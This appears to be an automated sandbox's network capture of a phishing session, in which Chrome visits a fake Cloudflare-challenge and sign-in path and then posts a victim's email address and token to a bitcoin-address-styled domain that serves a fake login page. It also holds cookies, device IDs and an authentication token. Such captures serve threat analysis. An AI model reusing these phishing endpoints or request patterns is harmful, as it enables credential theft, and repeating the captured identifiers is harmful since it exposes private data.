                                                                                                                              2024-11-18 16:56:23 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              50192.168.2.1749771152.199.21.1754436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:23 UTC419OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:23 UTC737INHTTP/1.1 200 OK
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Age: 2901084
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:23 GMT
                                                                                                                              Etag: 0x8D7B007297AE131
                                                                                                                              Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT
                                                                                                                              Server: ECAcc (lhc/7886)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Cache: HIT
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-request-id: 53477596-701e-00df-0778-1fca5d000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              Content-Length: 1864
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:56:23 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.2.174977240.126.32.68443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:28 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4808
                                                                                                                              Host: login.live.com
                                                                                                                              2024-11-18 16:56:28 UTC4808OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-11-18 16:56:28 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Mon, 18 Nov 2024 16:55:28 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BAY
                                                                                                                              x-ms-request-id: 2daa6615-0e5c-4d40-8d7c-160f7cbdfee8
                                                                                                                              PPServer: PPV: 30 H: PH1PEPF00011E52 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:28 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11197
                                                                                                                              2024-11-18 16:56:28 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              52192.168.2.174977313.107.5.88443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:28 UTC537OUTGET /ab HTTP/1.1
                                                                                                                              Host: evoke-windowsservices-tas.msedge.net
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              X-PHOTOS-CALLERID: 9NMPJ99VJBWV
                                                                                                                              X-EVOKE-RING:
                                                                                                                              X-WINNEXT-RING: Public
                                                                                                                              X-WINNEXT-TELEMETRYLEVEL: Basic
                                                                                                                              X-WINNEXT-OSVERSION: 10.0.19045.0
                                                                                                                              X-WINNEXT-APPVERSION: 1.23082.131.0
                                                                                                                              X-WINNEXT-PLATFORM: Desktop
                                                                                                                              X-WINNEXT-CANTAILOR: False
                                                                                                                              X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}
                                                                                                                              X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=
                                                                                                                              If-None-Match: 2056388360_-1434155563
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              2024-11-18 16:56:28 UTC209INHTTP/1.1 400 Bad Request
                                                                                                                              X-MSEdge-Ref: Ref A: C53125EF05514720BC06ED50AC61D2BE Ref B: DFW311000107019 Ref C: 2024-11-18T16:56:28Z
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:28 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              53192.168.2.17497752.23.209.179443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:29 UTC2585OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                              X-BM-Market: CH
                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                              X-Device-OSSKU: 48
                                                                                                                              X-BM-DTZ: -300
                                                                                                                              X-DeviceID: 01000A41090080B6
                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                              X-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard Time
                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                              X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATKroDVehIwhR1af/NJXyEM/gWDmFHEyD/jvuxhb%2BEp%2BvftiDzLladduscq70ZpGhopdhEZ8qqmoHfIbPOSm0ugw3lhj3wJ9chhQzLUzuVkc/Fsc2Fy3cEeW6nFt1DjKEUSbAuArYcH8K2VpTtXi2iJT6WF5QLWupR1oI4/nrOgYjw%2B9EN2UiNbSRpRi%2BlbNvKOnMP/AM%2B7wbBEXXZQLov3CC4Z6plGqpD7kQ/JHTc5EilGf3jFWO9ofEF2EPhUhqWfv0vrT1fCOfdh9h%2BnJMHjCmEDgPxB8uuh7BhVOFIOqYB5jYNhlUhOn5cy9jVnPEnvlpoOXPtxV84wBnGKRN6cQZgAAEKEhzTaRKODLtvfk2V6x70awAfoXS%2B/EnknHIyjanr7q%2BqrhDuk1eZ9nmn4HYONYzsNp75mJcyWN8CSnrDfyY9Bf3/5G6g/2y/PoEhM3Mg6PrSSlp6b4xSGekoRRKMyg0mxmfFf6K9/sllXbk0OR%2BKJhIO75x/dN0VV8RJK49YbrzDdJgHVIMRVQerFapfmGjFlFhK3E2EDXlEHMhQg1RYAhYLVKCgyt%2BlKfghtuKQSAIooXLBtvLi4LlebYYU%2B36jXpwsyXlwwkt1kRcfXmHdbCO6XcIejtQXK5hc%2BSYoSMblBpUpTShzH%2BEJXK8TqRTWQLYCdwaWftz20paj9xV/53ph4ErasRw3SW3570tH8t532O/rga5AQC1t69EmmngayDOJDGqI2WO8wmCsTE9UBxM6yAZtppKFIye/AyxXV9BTrIcfIWGQcB2wbj1wDU6T2SoNuXaWtos7dhf5M6H7kPNMy20sk0MqwiVeTRckXXNudmkZrpoD/Gk0U0tmhkBZskAw7f37X/BH%2BO1usxb2rHrYIdTNvDyH1p9MnfuNKBlnnOZdkkQRSkVigT4%2BHGUtmSZzw [TRUNCATED]
                                                                                                                              X-Agent-DeviceId: 01000A41090080B6
                                                                                                                              X-BM-CBT: 1731948986
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                              X-Device-isOptin: false
                                                                                                                              Accept-language: en-GB, en, en-US
                                                                                                                              X-Device-Touch: false
                                                                                                                              X-Device-ClientSession: 67B87F79F7DB4D5D925739CF3A7A9AAD
                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                              Host: www.bing.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                                                              2024-11-18 16:56:30 UTC1147INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 2215
                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                              Cache-Control: private
                                                                                                                              X-EventID: 673b71bdb1b844d081b53120c3c44d1f
                                                                                                                              X-AS-SetSessionMarket: de-ch
                                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:29 GMT
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: _EDGE_S=SID=3ABE7425490D6E653072611E48C96FC3&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                                              Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Sat, 13-Dec-2025 16:56:29 GMT; path=/; secure; SameSite=None
                                                                                                                              Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                              Set-Cookie: _SS=SID=3ABE7425490D6E653072611E48C96FC3; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                              X-CDN-TraceID: 0.0cd01702.1731948989.17c1399
                                                                                                                              2024-11-18 16:56:30 UTC2215INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                                              Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              54192.168.2.1749830208.91.198.814436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:31 UTC843OUTGET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1
                                                                                                                              Host: timesofvartha.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: max-age=0
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://timesofvartha.com/cloudflare-challenge/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              If-Modified-Since: Thu, 14 Nov 2024 13:43:20 GMT
                                                                                                                              2024-11-18 16:56:31 UTC195INHTTP/1.1 304 Not Modified
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:31 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Thu, 14 Nov 2024 13:43:20 GMT
                                                                                                                              Accept-Ranges: bytes


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              55192.168.2.1749832154.216.17.1934436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:32 UTC520OUTOPTIONS / HTTP/1.1
                                                                                                                              Host: bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                              Connection: keep-alive
                                                                                                                              Accept: */*
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:32 UTC292INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:32 GMT
                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                              Access-Control-Allow-Headers: Content-Type
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              56192.168.2.1749833154.216.17.1934436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:33 UTC616OUTPOST / HTTP/1.1
                                                                                                                              Host: bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 83
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Content-Type: application/json
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:33 UTC83OUTData Raw: 7b 22 70 61 72 61 6d 65 74 65 72 22 3a 22 4d 72 65 74 74 69 6e 67 65 72 40 64 63 6e 64 78 2e 63 6f 6d 22 2c 22 74 6f 6b 65 6e 22 3a 22 39 66 61 38 61 35 32 64 2d 35 30 31 30 2d 34 64 38 66 2d 61 36 31 33 2d 37 63 30 33 38 64 62 66 63 62 37 62 22 7d
                                                                                                                              Data Ascii: {"parameter":"Mrettinger@dcndx.com","token":"9fa8a52d-5010-4d8f-a613-7c038dbfcb7b"}
                                                                                                                              2024-11-18 16:56:38 UTC324INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:33 GMT
                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                              Access-Control-Allow-Headers: Content-Type
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:56:38 UTC7868INData Raw: 33 32 34 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 48 54 4d 4c 20 63 6f 6e 74 65 6e 74 20 64 65 6c 69 76 65 72 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 68 74 6d 6c 22 3a 22 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 5c 22 65 6e 5c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 5c 22 55 54 46 2d 38 5c 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 5c 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 5c 22 20 68 72 65 66 3d 5c 22 64 61 74 61 3a 69 6d 61 67 65 5c 2f 78 2d 69 63 6f 6e 3b 2c 5c 22 20 74 79 70 65 3d 5c 22 69 6d 61 67 65 5c 2f 78 2d 69 63 6f 6e 5c 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 58 2d 55 41 2d 43 6f 6d 70
                                                                                                                              Data Ascii: 324c{"status":"success","message":"HTML content delivered successfully.","html":"<!DOCTYPE html><html lang=\"en\"><head><meta charset=\"UTF-8\"><link rel=\"shortcut icon\" href=\"data:image\/x-icon;,\" type=\"image\/x-icon\"><meta http-equiv=\"X-UA-Comp
                                                                                                                              2024-11-18 16:56:38 UTC5014INData Raw: 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 5c 22 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 6c 6f 61 64 69 6e 67 4c 6f 67 6f 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 63 6f 6e 74 61 69 6e 65 72 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 63 6f 6e 74 61 69 6e 65 72 53 68 61 64 6f 77 5c 22 3e 3c 5c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 5c 22 6c 6f 67 6f 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 66 6c 61 70 43 6f 6e 74 61 69 6e 65 72 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 6f 70 65 6e 65 64 46 6c 61 70 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 66 6d 61 73 6b 5c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 66 6c 61 70 54 72 69 61 6e 67 6c 65 5c 22 3e 3c 5c 2f 64 69 76 3e 3c 5c 2f 64 69 76 3e 3c 5c 2f 64 69 76 3e 3c 64 69 76 20 69
                                                                                                                              Data Ascii: ad><body><div id=\"loadingScreen\"><div id=\"loadingLogo\"><div id=\"container\"><div id=\"containerShadow\"><\/div><div id=\"logo\"><div id=\"flapContainer\"><div id=\"openedFlap\"><div id=\"fmask\"><div class=\"flapTriangle\"><\/div><\/div><\/div><div i
                                                                                                                              2024-11-18 16:56:38 UTC2INData Raw: 0d 0a
                                                                                                                              Data Ascii:
                                                                                                                              2024-11-18 16:56:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              57192.168.2.1749834154.216.17.1934436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:38 UTC355OUTGET / HTTP/1.1
                                                                                                                              Host: bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:39 UTC293INHTTP/1.1 200 OK
